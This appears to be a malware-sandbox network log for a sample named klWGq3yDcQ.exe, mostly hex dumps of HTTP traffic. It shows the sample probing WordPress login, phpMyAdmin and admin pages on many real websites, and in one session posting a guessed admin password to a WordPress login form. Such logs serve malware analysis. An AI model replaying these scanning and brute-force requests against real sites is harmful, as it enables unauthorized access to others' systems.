                                                                                                                                                                                                    2023-11-26 05:59:43 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC7301INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 66 66 38 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53 74
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cookiff8es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, St


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    374192.168.2.465302185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC341INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 323Connection: closeLocation: http://www.grantstech.io/phpMyAdmin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    375192.168.2.46506834.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC581INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6238Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineSet-Cookie:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    376192.168.2.465483144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC352INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7840INData Raw: 32 38 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 282a<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2448INData Raw: 20 25 32 24 73 21 20 55 73 65 20 25 33 24 73 20 69 6e 73 74 65 61 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 69 64 65 72 20 77 72 69 74 69 6e 67 20 6d 6f 72 65 20 69 6e 63 6c 75 73 69 76 65 20 63 6f 64 65 2e 22 3a 5b 22 5c 75 30 30 61 31 25 31 24 73 20 65 73 74 5c 75 30 30 65 31 20 65 6e 20 64 65 73 75 73 6f 20 64 65 73 64 65 20 6c 61 20 76 65 72 73 69 5c 75 30 30 66 33 6e 20 25 32 24 73 21 20 55 73 61 20 25 33 24 73 20 65 6e 20 73 75 20 6c 75 67 61 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 63 6f 6e 73 69 64 65 72 61 20 65 73 63 72 69 62 69 72 20 75 6e 20 63 5c 75 30 30 66 33 64 69 67 6f 20 6d 5c 75 30 30 65 31 73 20 69 6e 63 6c 75 73 69 76 6f 2e 22 5d 7d 7d 2c 22 63 6f 6d 6d 65 6e 74 22 3a 7b 22 72 65 66 65 72 65 6e 63 65 22 3a 22 77 70 2d 61 64 6d 69 6e 5c
                                                                                                                                                                                                    Data Ascii: %2$s! Use %3$s instead. Please consider writing more inclusive code.":["\u00a1%1$s est\u00e1 en desuso desde la versi\u00f3n %2$s! Usa %3$s en su lugar. Por favor considera escribir un c\u00f3digo m\u00e1s inclusivo."]}},"comment":{"reference":"wp-admin\
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    377192.168.2.449362172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC330OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://samson.pe/wp-login.php
                                                                                                                                                                                                    Content-Length: 136
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC136OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 37 31 32 33 73 61 6d 73 6f 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 49 6e 69 63 69 61 72 2b 73 65 73 69 25 43 33 25 42 33 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6d 73 6f 6e 2e 70 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=7123samson&rememberme=forever&wp-submit=Iniciar+sesi%C3%B3n&redirect_to=https%3A%2F%2Fsamson.pe%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC813INData Raw: 32 34 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 242d<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC8456INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    378192.168.2.44929654.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC294INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 70 61 67 65 73 2f 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: Apache/2.4.52 (Ubuntu)location: https://ce-logic.com/admin/pages/vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateContent-Length: 0Connection: closeCon


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    379192.168.2.46530115.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
